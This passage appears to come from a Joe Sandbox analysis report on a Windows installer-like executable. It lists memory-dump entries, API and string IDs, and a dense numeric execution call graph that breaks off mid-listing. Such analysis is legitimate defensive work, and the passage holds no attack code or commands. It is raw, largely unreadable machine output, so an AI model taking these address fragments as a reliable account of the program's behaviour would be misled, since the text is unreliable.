                                 • Associated: 00000005.00000002.1953185042.000000006CA28000.00000002.00000001.01000000.00000009.sdmp
                                 • Associated: 00000005.00000002.1953272724.000000006CA38000.00000008.00000001.01000000.00000009.sdmp
                                 • Associated: 00000005.00000002.1953912671.000000006CB03000.00000004.00000001.01000000.00000009.sdmp
                                 • Associated: 00000005.00000002.1953948209.000000006CB09000.00000020.00000001.01000000.00000009.sdmp
                                 • Associated: 00000005.00000002.1954651204.000000006CBF2000.00000002.00000001.01000000.00000009.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_6c880000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                Similarity
                                • API ID: ___std_exception_destroy
                                • String ID: Jbx$Jbx
                                • API String ID: 4194217158-1161259238
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.1953272724.000000006CA38000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CA38000, based on PE: true
                                 • Associated: 00000005.00000002.1953912671.000000006CB03000.00000004.00000001.01000000.00000009.sdmp
                                 • Associated: 00000005.00000002.1953948209.000000006CB09000.00000020.00000001.01000000.00000009.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_6c880000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                Similarity
                                • API ID: H_prolog
                                • String ID: <dJ$Q
                                • API String ID: 3519838083-2252229148
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.1953272724.000000006CA38000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CA38000, based on PE: true
                                 • Associated: 00000005.00000002.1953912671.000000006CB03000.00000004.00000001.01000000.00000009.sdmp
                                 • Associated: 00000005.00000002.1953948209.000000006CB09000.00000020.00000001.01000000.00000009.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_6c880000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                Similarity
                                • API ID: H_prolog
                                • String ID: $D^J
                                • API String ID: 3519838083-3977321784
                                APIs
                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00000000,?,?,00000000,6CA246D6), ref: 6CA1D01B
                                • __dosmaperr.LIBCMT ref: 6CA1D022
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.1951906394.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                 • Associated: 00000005.00000002.1951876229.000000006C880000.00000002.00000001.01000000.00000009.sdmp
                                 • Associated: 00000005.00000002.1953185042.000000006CA28000.00000002.00000001.01000000.00000009.sdmp
                                 • Associated: 00000005.00000002.1953272724.000000006CA38000.00000008.00000001.01000000.00000009.sdmp
                                 • Associated: 00000005.00000002.1953912671.000000006CB03000.00000004.00000001.01000000.00000009.sdmp
                                 • Associated: 00000005.00000002.1953948209.000000006CB09000.00000020.00000001.01000000.00000009.sdmp
                                 • Associated: 00000005.00000002.1954651204.000000006CBF2000.00000002.00000001.01000000.00000009.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_6c880000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                Similarity
                                • API ID: ErrorLast__dosmaperr
                                • String ID: 8Q
                                • API String ID: 1659562826-4022487301
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.1953272724.000000006CA38000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CA38000, based on PE: true
                                 • Associated: 00000005.00000002.1953912671.000000006CB03000.00000004.00000001.01000000.00000009.sdmp
                                 • Associated: 00000005.00000002.1953948209.000000006CB09000.00000020.00000001.01000000.00000009.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_6c880000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                Similarity
                                • API ID: H_prolog
                                • String ID: X&L$p|J
                                • API String ID: 3519838083-2944591232
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.1953272724.000000006CA38000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CA38000, based on PE: true
                                 • Associated: 00000005.00000002.1953912671.000000006CB03000.00000004.00000001.01000000.00000009.sdmp
                                 • Associated: 00000005.00000002.1953948209.000000006CB09000.00000020.00000001.01000000.00000009.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_6c880000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                Similarity
                                • API ID: H_prolog
                                • String ID: 0|J$`)L
                                • API String ID: 3519838083-117937767
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.1953272724.000000006CA38000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CA38000, based on PE: true
                                 • Associated: 00000005.00000002.1953912671.000000006CB03000.00000004.00000001.01000000.00000009.sdmp
                                 • Associated: 00000005.00000002.1953948209.000000006CB09000.00000020.00000001.01000000.00000009.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_6c880000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                Similarity
                                • API ID: __aulldiv
                                • String ID: 3333
                                • API String ID: 3732870572-2924271548
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.1953272724.000000006CA38000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CA38000, based on PE: true
                                 • Associated: 00000005.00000002.1953912671.000000006CB03000.00000004.00000001.01000000.00000009.sdmp
                                 • Associated: 00000005.00000002.1953948209.000000006CB09000.00000020.00000001.01000000.00000009.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_6c880000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                Similarity
                                • API ID: H_prolog
                                • String ID: @$LuJ
                                • API String ID: 3519838083-205571748
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.1953272724.000000006CA38000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CA38000, based on PE: true
                                 • Associated: 00000005.00000002.1953912671.000000006CB03000.00000004.00000001.01000000.00000009.sdmp
                                 • Associated: 00000005.00000002.1953948209.000000006CB09000.00000020.00000001.01000000.00000009.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_6c880000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                Similarity
                                • API ID: H_prolog
                                • String ID: @$xMJ
                                • API String ID: 3519838083-951924499
                                APIs
                                • _free.LIBCMT ref: 6CA1DD49
                                • HeapReAlloc.KERNEL32(00000000,?,?,00000004,00000000,?,6CA1A63A,?,00000004,?,4B42FCB6,?,?,6CA0F78C,4B42FCB6,?), ref: 6CA1DD85
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.1951906394.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                 • Associated: 00000005.00000002.1951876229.000000006C880000.00000002.00000001.01000000.00000009.sdmp
                                 • Associated: 00000005.00000002.1953185042.000000006CA28000.00000002.00000001.01000000.00000009.sdmp
                                 • Associated: 00000005.00000002.1953272724.000000006CA38000.00000008.00000001.01000000.00000009.sdmp
                                 • Associated: 00000005.00000002.1953912671.000000006CB03000.00000004.00000001.01000000.00000009.sdmp
                                 • Associated: 00000005.00000002.1953948209.000000006CB09000.00000020.00000001.01000000.00000009.sdmp
                                 • Associated: 00000005.00000002.1954651204.000000006CBF2000.00000002.00000001.01000000.00000009.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_6c880000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                Similarity
                                • API ID: AllocHeap_free
                                • String ID: 8Q
                                • API String ID: 1080816511-4022487301
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.1953272724.000000006CA38000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CA38000, based on PE: true
                                 • Associated: 00000005.00000002.1953912671.000000006CB03000.00000004.00000001.01000000.00000009.sdmp
                                 • Associated: 00000005.00000002.1953948209.000000006CB09000.00000020.00000001.01000000.00000009.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_6c880000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                Similarity
                                • API ID: H_prologctype
                                • String ID: |zJ
                                • API String ID: 3037903784-3782439380
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.1953272724.000000006CA38000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CA38000, based on PE: true
                                 • Associated: 00000005.00000002.1953912671.000000006CB03000.00000004.00000001.01000000.00000009.sdmp
                                 • Associated: 00000005.00000002.1953948209.000000006CB09000.00000020.00000001.01000000.00000009.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_6c880000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                Similarity
                                • API ID: H_prologctype
                                • String ID: <oJ
                                • API String ID: 3037903784-2791053824
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.1953272724.000000006CA38000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CA38000, based on PE: true
                                 • Associated: 00000005.00000002.1953912671.000000006CB03000.00000004.00000001.01000000.00000009.sdmp
                                 • Associated: 00000005.00000002.1953948209.000000006CB09000.00000020.00000001.01000000.00000009.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_6c880000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                Similarity
                                • API ID:
                                • String ID: @ K$DJ$T)K$X/K
                                • API String ID: 0-3815299647
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.1953272724.000000006CA38000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CA38000, based on PE: true
                                 • Associated: 00000005.00000002.1953912671.000000006CB03000.00000004.00000001.01000000.00000009.sdmp
                                 • Associated: 00000005.00000002.1953948209.000000006CB09000.00000020.00000001.01000000.00000009.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_6c880000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                Similarity
                                • API ID:
                                • String ID: D)K$H)K$P)K$T)K
                                • API String ID: 0-2262112463

                                Execution Graph

                                Execution Coverage:4%
                                Dynamic/Decrypted Code Coverage:0%
                                Signature Coverage:0.4%
                                Total number of Nodes:2000
                                Total number of Limit Nodes:35
73544->73545 73547 a61e40 free ctype 73544->73547 74490 a7089e malloc _CxxThrowException free _CxxThrowException memcpy 73544->74490 74492 a82c6c 6 API calls 2 library calls 73545->74492 73547->73544 73550 a82277 74493 a61e40 free 73550->74493 73552 a82347 74512 a61e40 free 73552->74512 73554 a8227f 74494 a61e40 free 73554->74494 73555 a62e04 2 API calls 73602 a8232b 73555->73602 73556 a82a55 74513 a61e40 free 73556->74513 73559 a82287 74495 a61e40 free 73559->74495 73560 a8228f 73560->73291 73560->73292 73562 a66c72 44 API calls 73562->73602 73563 a82969 74509 a6757d GetLastError 73563->74509 73565 a8296e 73566 a82836 74500 a61e40 free 73566->74500 73574 a62fec malloc _CxxThrowException free 73574->73602 73575 a82855 74501 a61e40 free 73575->74501 73577 a82860 73579 a83247 free 73577->73579 73578 a8289d 74503 a61e40 free 73578->74503 73583 a828a8 73585 a83247 free 73583->73585 73589 a83247 free 73589->73602 73592 a62f1c 2 API calls 73592->73602 73597 a828e6 74505 a61e40 free 73597->74505 73601 a828f1 73603 a83247 free 73601->73603 73602->73552 73602->73555 73602->73562 73602->73563 73602->73566 73602->73574 73602->73575 73602->73578 73602->73589 73602->73592 73602->73597 73604 a82921 73602->73604 73608 a61e40 free ctype 73602->73608 73617 a61fa0 fputc 73602->73617 74317 a747dd 73602->74317 74321 a96086 73602->74321 74333 a82b09 73602->74333 74339 a831d8 73602->74339 74345 a82a72 73602->74345 74349 a96359 73602->74349 74392 a82cdb 73602->74392 74478 a82bb5 73602->74478 74496 a73e26 30 API calls 2 library calls 73602->74496 74497 a66456 9 API calls 2 library calls 73602->74497 74498 a6859e malloc _CxxThrowException free _CxxThrowException 73602->74498 74499 a8204d CharUpperW 73602->74499 74507 a61e40 free 73604->74507 73608->73602 73610 a8292c 73612 a83247 free 73610->73612 73617->73602 73624->73254 73625->73288 73626->73285 73627->73298 73665->73249 73666->73253 73667->73255 73668->73259 73669->73263 73671 a8324e 73670->73671 73672 a83260 73671->73672 75731 a61e40 
free 73671->75731 75730 a61e40 free 73672->75730 73675 a83267 73676 a61e40 free 73675->73676 73676->73270 73677->73274 73678->73279 73679->73282 73680->73390 73682 a80224 __EH_prolog 73681->73682 73738 a73d66 73682->73738 73685 a8062e 73687 a80638 __EH_prolog 73685->73687 73686 a806de 73825 a8019a malloc _CxxThrowException free memcpy 73686->73825 73687->73686 73691 a801bc malloc _CxxThrowException free _CxxThrowException memcpy 73687->73691 73694 a806ee 73687->73694 73754 a80703 73687->73754 73824 a92db9 free ctype 73687->73824 73689 a806e6 73826 a81453 26 API calls 2 library calls 73689->73826 73691->73687 73694->73402 73694->73416 73695->73405 73696->73410 73697->73416 73699 aa04df 73698->73699 73700 aa0513 73698->73700 73701 aa04e8 _CxxThrowException 73699->73701 73702 aa04fd 73699->73702 73700->73416 73701->73702 74158 aa0551 malloc _CxxThrowException free memcpy ctype 73702->74158 73704->73416 73705->73416 73706->73408 73707->73413 73709 a69245 73708->73709 74159 a690da 73709->74159 73712->73430 73713->73430 73714->73420 73716 a819e1 73715->73716 73717 a87ec6 73715->73717 73719 a712d4 73716->73719 73717->73716 73718 a61e40 free ctype 73717->73718 73718->73717 73720 a712e7 73719->73720 73726 a71327 73719->73726 73721 a71304 73720->73721 73722 a712ef _CxxThrowException 73720->73722 74211 a61e40 free 73721->74211 73722->73721 73724 a7130b 73725 a61e0c ctype 2 API calls 73724->73725 73725->73726 73726->73428 73727->73440 73728->73436 73729->73438 73730->73410 73731->73444 73732->73447 73733->73449 73734->73451 73735->73453 73736->73455 73737->73457 73749 affb10 73738->73749 73740 a73d70 GetCurrentProcess 73750 a73e04 73740->73750 73742 a73d8d OpenProcessToken 73743 a73de3 73742->73743 73744 a73d9e LookupPrivilegeValueW 73742->73744 73746 a73e04 CloseHandle 73743->73746 73744->73743 73745 a73dc0 AdjustTokenPrivileges 73744->73745 73745->73743 73747 a73dd5 GetLastError 73745->73747 73748 a73def 73746->73748 73747->73743 73748->73685 73749->73740 73751 a73e11 
CloseHandle 73750->73751 73752 a73e0d 73750->73752 73753 a73e21 73751->73753 73752->73742 73753->73742 73780 a8070d __EH_prolog 73754->73780 73755 a80e1d 73868 a80416 18 API calls 2 library calls 73755->73868 73757 a80ea6 73870 aaec78 free ctype 73757->73870 73758 a80d11 73859 a67496 7 API calls 2 library calls 73758->73859 73761 a80c13 73856 a61e40 free 73761->73856 73765 a80c83 73765->73755 73765->73758 73766 a80b40 73766->73687 73767 a80de0 73864 a92db9 free ctype 73767->73864 73768 a62da9 2 API calls 73788 a80ab5 73768->73788 73769 a80e47 73769->73757 73869 a8117d 68 API calls 2 library calls 73769->73869 73773 a62e04 2 API calls 73773->73780 73774 a62e04 2 API calls 73774->73788 73777 a80e02 73867 a92db9 free ctype 73777->73867 73779 a62e04 2 API calls 73782 a80d29 73779->73782 73780->73765 73780->73766 73780->73773 73783 a62fec 3 API calls 73780->73783 73780->73788 73798 a80b26 73780->73798 73801 aa04d2 malloc _CxxThrowException free _CxxThrowException memcpy 73780->73801 73812 a92db9 free ctype 73780->73812 73819 a80b48 73780->73819 73821 a61524 malloc _CxxThrowException 73780->73821 73822 a61e40 free ctype 73780->73822 73827 a62da9 73780->73827 73830 a62f4a malloc _CxxThrowException free ctype 73780->73830 73831 a61089 malloc _CxxThrowException free _CxxThrowException 73780->73831 73832 a813eb 5 API calls 2 library calls 73780->73832 73833 a8050b 73780->73833 73838 a80021 GetLastError 73780->73838 73839 a649bd 9 API calls 2 library calls 73780->73839 73840 a80306 12 API calls 73780->73840 73841 a7ff00 5 API calls 2 library calls 73780->73841 73842 a8057d 16 API calls 2 library calls 73780->73842 73843 a80f8e 24 API calls 2 library calls 73780->73843 73844 a6472e CharUpperW 73780->73844 73845 a78984 malloc _CxxThrowException free _CxxThrowException memcpy 73780->73845 73846 a80ef4 68 API calls 2 library calls 73780->73846 73782->73767 73782->73779 73787 a62fec 3 API calls 73782->73787 73795 a80df3 73782->73795 73796 a61e40 free ctype 73782->73796 73800 
a80df8 73782->73800 73860 a62f1c 73782->73860 73863 a8117d 68 API calls 2 library calls 73782->73863 73783->73780 73787->73782 73788->73761 73788->73768 73788->73774 73789 a62fec 3 API calls 73788->73789 73793 a8050b 44 API calls 73788->73793 73803 a80c79 73788->73803 73810 a61e40 free ctype 73788->73810 73847 a62f4a malloc _CxxThrowException free ctype 73788->73847 73852 a61089 malloc _CxxThrowException free _CxxThrowException 73788->73852 73853 a813eb 5 API calls 2 library calls 73788->73853 73854 a80ef4 68 API calls 2 library calls 73788->73854 73855 a92db9 free ctype 73788->73855 73857 a80021 GetLastError 73788->73857 73789->73788 73793->73788 73865 a61e40 free 73795->73865 73796->73782 73848 a61e40 free 73798->73848 73866 a61e40 free 73800->73866 73801->73780 73858 a61e40 free 73803->73858 73804 a80b30 73849 a61e40 free 73804->73849 73808 a80b38 73850 a61e40 free 73808->73850 73810->73788 73812->73780 73851 a92db9 free ctype 73819->73851 73821->73780 73822->73780 73824->73687 73825->73689 73826->73694 73871 a62d4d 73827->73871 73829 a62dc6 73829->73780 73830->73780 73831->73780 73832->73780 73877 a66c72 73833->73877 73835 a80575 73835->73780 73838->73780 73839->73780 73840->73780 73841->73780 73842->73780 73843->73780 73844->73780 73845->73780 73846->73780 73847->73788 73848->73804 73849->73808 73850->73766 73851->73798 73852->73788 73853->73788 73854->73788 73855->73788 73856->73766 73857->73788 73858->73765 73859->73782 73861 a62ba6 2 API calls 73860->73861 73862 a62f2c 73861->73862 73862->73782 73863->73782 73864->73766 73865->73800 73866->73777 73867->73766 73868->73769 73869->73769 73870->73766 73874 a62ba6 73871->73874 73873 a62d68 73873->73829 73873->73873 73875 a61e0c ctype 2 API calls 73874->73875 73876 a62bbb 73875->73876 73876->73873 73879 a66c7c __EH_prolog 73877->73879 73878 a66cd3 73881 a66ce2 73878->73881 73884 a66d87 73878->73884 73879->73878 73880 a66cb7 73879->73880 73882 a62f88 3 API calls 73880->73882 73883 a62f88 3 API calls 73881->73883 
73908 a66cc7 73882->73908 73888 a66cf5 73883->73888 73893 a66f4a 73884->73893 74005 a62e47 73884->74005 73887 a62e47 2 API calls 73898 a66dc0 73887->73898 73889 a66d4a 73888->73889 73891 a66d0b 73888->73891 74001 a67b41 28 API calls 73889->74001 74000 a69252 GetModuleHandleW GetProcAddress GetDiskFreeSpaceW 73891->74000 73892 a66d5f 74002 a6764c 73892->74002 73894 a66fd1 73893->73894 73896 a66f7e 73893->73896 73900 a670e5 73894->73900 73901 a66fed 73894->73901 73922 a6701d 73894->73922 74023 a66bf5 11 API calls 2 library calls 73896->74023 73897 a66d36 73897->73889 73903 a66d3a 73897->73903 73913 a66dfe 73898->73913 74009 a63221 malloc _CxxThrowException free _CxxThrowException 73898->74009 73984 a66868 73900->73984 74025 a66bf5 11 API calls 2 library calls 73901->74025 73903->73908 73907 a66f85 73907->73900 73911 a66f99 73907->73911 73908->73835 73978 a62f88 73908->73978 73909 a66ff2 73909->73900 73914 a67006 73909->73914 73910 a66fca 73917 a66848 FindClose 73910->73917 73918 a62f88 3 API calls 73911->73918 73912 a66e43 73916 a66c72 42 API calls 73912->73916 73913->73912 73925 a66e1e 73913->73925 73914->73910 73920 a66e4e 73916->73920 73917->73908 73921 a66fb0 73918->73921 73923 a66e41 73920->73923 73924 a66f3a 73920->73924 74024 a6717b 13 API calls 73921->74024 73922->73900 74026 a6717b 13 API calls 73922->74026 73931 a62f1c 2 API calls 73923->73931 74021 a61e40 free 73924->74021 73925->73923 73928 a62fec 3 API calls 73925->73928 73928->73923 73930 a67052 73934 a67056 73930->73934 73935 a67064 73930->73935 73936 a66e77 73931->73936 73932 a66f42 74022 a61e40 free 73932->74022 73937 a62f88 3 API calls 73934->73937 73939 a62e47 2 API calls 73935->73939 73938 a62e04 2 API calls 73936->73938 73941 a6705f 73937->73941 73964 a66e83 73938->73964 73940 a6706d 73939->73940 74027 a61089 malloc _CxxThrowException free _CxxThrowException 73940->74027 73945 a66848 FindClose 73941->73945 73944 a6707b 74028 a61089 malloc _CxxThrowException free _CxxThrowException 73944->74028 
73945->73908 73946 a66ecf 74014 a61e40 free 73946->74014 73948 a66ec7 SetLastError 73948->73946 73949 a67085 73952 a66868 12 API calls 73949->73952 73954 a67095 73952->73954 73953 a66f11 74015 a61e40 free 73953->74015 73957 a670bb 73954->73957 73958 a67099 wcscmp 73954->73958 73955 a66ed3 74013 a631e5 malloc _CxxThrowException free _CxxThrowException 73955->74013 74029 a66bf5 11 API calls 2 library calls 73957->74029 73958->73957 73961 a670b1 73958->73961 73960 a66f19 74016 a66848 73960->74016 73967 a62f88 3 API calls 73961->73967 73964->73946 73964->73948 73964->73955 73968 a62e04 2 API calls 73964->73968 74010 a66bb5 17 API calls 73964->74010 74011 a622bf CharUpperW 73964->74011 74012 a61e40 free 73964->74012 73966 a670c6 73972 a670d8 73966->73972 73976 a67129 73966->73976 73970 a6714c 73967->73970 73968->73964 74032 a61e40 free 73970->74032 74030 a61e40 free 73972->74030 73975 a66f2b 74020 a61e40 free 73975->74020 73976->73961 73979 a62f9a 73978->73979 73980 a62fbe 73979->73980 73981 a61e0c ctype 2 API calls 73979->73981 73980->73835 73982 a62fb4 73981->73982 74157 a61e40 free 73982->74157 73985 a66872 __EH_prolog 73984->73985 73986 a66848 FindClose 73985->73986 73988 a66880 73986->73988 73987 a668f6 73987->73910 74031 a6717b 13 API calls 73987->74031 73988->73987 73989 a6689b FindFirstFileW 73988->73989 73990 a668a9 73988->73990 73989->73990 73991 a668ee 73990->73991 73992 a62e04 2 API calls 73990->73992 73991->73987 74039 a66919 malloc _CxxThrowException free 73991->74039 73994 a668ba 73992->73994 74033 a68b4a 73994->74033 73996 a668d0 73997 a668d4 FindFirstFileW 73996->73997 73998 a668e2 73996->73998 73997->73998 74038 a61e40 free 73998->74038 74000->73897 74001->73892 74003 a67656 CloseHandle 74002->74003 74004 a67661 74002->74004 74003->74004 74004->73908 74006 a62e57 74005->74006 74007 a62ba6 2 API calls 74006->74007 74008 a62e6a 74007->74008 74008->73887 74009->73913 74010->73964 74011->73964 74012->73964 74013->73946 74014->73953 74015->73960 74017 
a66852 FindClose 74016->74017 74018 a6685d 74016->74018 74017->74018 74019 a61e40 free 74018->74019 74019->73975 74020->73908 74021->73932 74022->73893 74023->73907 74024->73910 74025->73909 74026->73930 74027->73944 74028->73949 74029->73966 74030->73909 74031->73910 74032->73941 74040 a68b80 74033->74040 74036 a62f88 3 API calls 74037 a68b6e 74036->74037 74037->73996 74038->73991 74039->73987 74042 a68b8a __EH_prolog 74040->74042 74041 a68b55 74041->74036 74041->74037 74042->74041 74043 a68c7b 74042->74043 74049 a68be1 74042->74049 74044 a68d23 74043->74044 74046 a68c8f 74043->74046 74045 a68e8a 74044->74045 74048 a68d3b 74044->74048 74047 a62e47 2 API calls 74045->74047 74046->74048 74054 a68c9e 74046->74054 74050 a68e96 74047->74050 74051 a62e04 2 API calls 74048->74051 74049->74041 74052 a62e47 2 API calls 74049->74052 74058 a62e47 2 API calls 74050->74058 74053 a68d43 74051->74053 74055 a68c05 74052->74055 74137 a66332 6 API calls 2 library calls 74053->74137 74057 a62e47 2 API calls 74054->74057 74062 a68c17 74055->74062 74063 a68c24 74055->74063 74066 a68ca7 74057->74066 74060 a68eb8 74058->74060 74059 a68d52 74061 a68d56 74059->74061 74138 a6859e malloc _CxxThrowException free _CxxThrowException 74059->74138 74149 a68f57 memmove 74060->74149 74148 a61e40 free 74061->74148 74127 a61e40 free 74062->74127 74069 a62e47 2 API calls 74063->74069 74071 a62e47 2 API calls 74066->74071 74068 a68ec4 74072 a68ede 74068->74072 74073 a68ec8 74068->74073 74074 a68c35 74069->74074 74075 a68cd0 74071->74075 74152 a63221 malloc _CxxThrowException free _CxxThrowException 74072->74152 74150 a61e40 free 74073->74150 74128 a68f57 memmove 74074->74128 74132 a68f57 memmove 74075->74132 74080 a68ed0 74151 a61e40 free 74080->74151 74081 a68c41 74085 a68c6b 74081->74085 74129 a631e5 malloc _CxxThrowException free _CxxThrowException 74081->74129 74082 a68eeb 74153 a631e5 malloc _CxxThrowException free _CxxThrowException 74082->74153 74083 a68cdc 74088 a68d13 74083->74088 74133 
a63221 malloc _CxxThrowException free _CxxThrowException 74083->74133 74131 a61e40 free 74085->74131 74136 a61e40 free 74088->74136 74090 a68f06 74154 a631e5 malloc _CxxThrowException free _CxxThrowException 74090->74154 74091 a68c73 74156 a61e40 free 74091->74156 74094 a68c60 74130 a631e5 malloc _CxxThrowException free _CxxThrowException 74094->74130 74096 a68ced 74134 a631e5 malloc _CxxThrowException free _CxxThrowException 74096->74134 74097 a62e04 2 API calls 74098 a68ddf 74097->74098 74102 a68e0e 74098->74102 74105 a68df1 74098->74105 74100 a68f11 74155 a61e40 free 74100->74155 74106 a62f88 3 API calls 74102->74106 74139 a63199 malloc _CxxThrowException free _CxxThrowException 74105->74139 74110 a68e0c 74106->74110 74107 a68d65 74107->74061 74107->74097 74108 a68d08 74135 a631e5 malloc _CxxThrowException free _CxxThrowException 74108->74135 74141 a68f57 memmove 74110->74141 74112 a68e03 74140 a63199 malloc _CxxThrowException free _CxxThrowException 74112->74140 74115 a68e22 74116 a68e26 74115->74116 74117 a68e3b 74115->74117 74142 a63221 malloc _CxxThrowException free _CxxThrowException 74115->74142 74147 a61e40 free 74116->74147 74143 a68f34 malloc _CxxThrowException 74117->74143 74121 a68e49 74144 a631e5 malloc _CxxThrowException free _CxxThrowException 74121->74144 74123 a68e56 74145 a61e40 free 74123->74145 74125 a68e62 74146 a631e5 malloc _CxxThrowException free _CxxThrowException 74125->74146 74127->74041 74128->74081 74129->74094 74130->74085 74131->74091 74132->74083 74133->74096 74134->74108 74135->74088 74136->74091 74137->74059 74138->74107 74139->74112 74140->74110 74141->74115 74142->74117 74143->74121 74144->74123 74145->74125 74146->74116 74147->74061 74148->74041 74149->74068 74150->74080 74151->74041 74152->74082 74153->74090 74154->74100 74155->74091 74156->74041 74157->73980 74158->73700 74160 a690e4 __EH_prolog 74159->74160 74161 a62f88 3 API calls 74160->74161 74162 a690f7 74161->74162 74163 a6915d 74162->74163 74167 a69109 74162->74167 
74164 a62e04 2 API calls 74163->74164 74165 a69165 74164->74165 74166 a691be 74165->74166 74168 a69174 74165->74168 74205 a66332 6 API calls 2 library calls 74166->74205 74171 a62e47 2 API calls 74167->74171 74183 a69155 74167->74183 74172 a62f88 3 API calls 74168->74172 74170 a6917d 74197 a691ca 74170->74197 74203 a6859e malloc _CxxThrowException free _CxxThrowException 74170->74203 74173 a69122 74171->74173 74172->74170 74200 a68f57 memmove 74173->74200 74177 a69185 74182 a62e04 2 API calls 74177->74182 74178 a6912e 74179 a6914d 74178->74179 74201 a631e5 malloc _CxxThrowException free _CxxThrowException 74178->74201 74202 a61e40 free 74179->74202 74184 a69197 74182->74184 74183->73430 74185 a691ce 74184->74185 74186 a6919f 74184->74186 74187 a62f88 3 API calls 74185->74187 74188 a691b9 74186->74188 74204 a61089 malloc _CxxThrowException free _CxxThrowException 74186->74204 74187->74188 74206 a63199 malloc _CxxThrowException free _CxxThrowException 74188->74206 74191 a691e6 74207 a68f57 memmove 74191->74207 74193 a691ee 74194 a691f2 74193->74194 74196 a62fec 3 API calls 74193->74196 74209 a61e40 free 74194->74209 74198 a69212 74196->74198 74210 a61e40 free 74197->74210 74208 a631e5 malloc _CxxThrowException free _CxxThrowException 74198->74208 74200->74178 74201->74179 74202->74183 74203->74177 74204->74188 74205->74170 74206->74191 74207->74193 74208->74194 74209->74197 74210->74183 74211->73724 74212->73465 74213->73461 74215 a61e0c ctype 2 API calls 74214->74215 74216 a626ea 74215->74216 74217 a95678 74216->74217 74218 a95689 74217->74218 74219 a956b1 74217->74219 74220 a95593 6 API calls 74218->74220 74235 a95593 74219->74235 74223 a956a5 74220->74223 74249 a628a1 74223->74249 74227 a9570e fputs 74233 a61fa0 fputc 74227->74233 74229 a956ef 74230 a95593 6 API calls 74229->74230 74231 a95701 74230->74231 74232 a95711 6 API calls 74231->74232 74232->74227 74233->73475 74234->73468 74236 a955ad 74235->74236 74237 a628a1 5 API calls 74236->74237 74238 a955b8 
74237->74238 74254 a6286d 74238->74254 74241 a628a1 5 API calls 74242 a955c7 74241->74242 74243 a95711 74242->74243 74244 a956e0 74243->74244 74245 a95721 74243->74245 74244->74227 74253 a62881 malloc _CxxThrowException free memcpy _CxxThrowException 74244->74253 74246 a628a1 5 API calls 74245->74246 74247 a9572b 74246->74247 74262 a955cd 6 API calls 74247->74262 74250 a628b0 74249->74250 74263 a6267f 74250->74263 74252 a628bf 74252->74219 74253->74229 74257 a61e9d 74254->74257 74258 a61ead 74257->74258 74259 a61ea8 74257->74259 74258->74241 74261 a6263c malloc _CxxThrowException free memcpy _CxxThrowException 74259->74261 74261->74258 74262->74244 74264 a626c2 74263->74264 74265 a62693 74263->74265 74264->74252 74266 a626c8 _CxxThrowException 74265->74266 74267 a626bc 74265->74267 74268 a626dd 74266->74268 74272 a62595 malloc _CxxThrowException free memcpy ctype 74267->74272 74269 a61e0c ctype 2 API calls 74268->74269 74271 a626ea 74269->74271 74271->74252 74272->74264 74273->73482 74283 a61e40 free 74274->74283 74276 a82c16 74284 a61e40 free 74276->74284 74278 a82c1e 74279 a61e40 free 74278->74279 74279->73486 74280->73488 74281->73490 74282->73492 74283->74276 74284->74278 74285->73502 74287 a9ad33 __EH_prolog 74286->74287 74288 a62e04 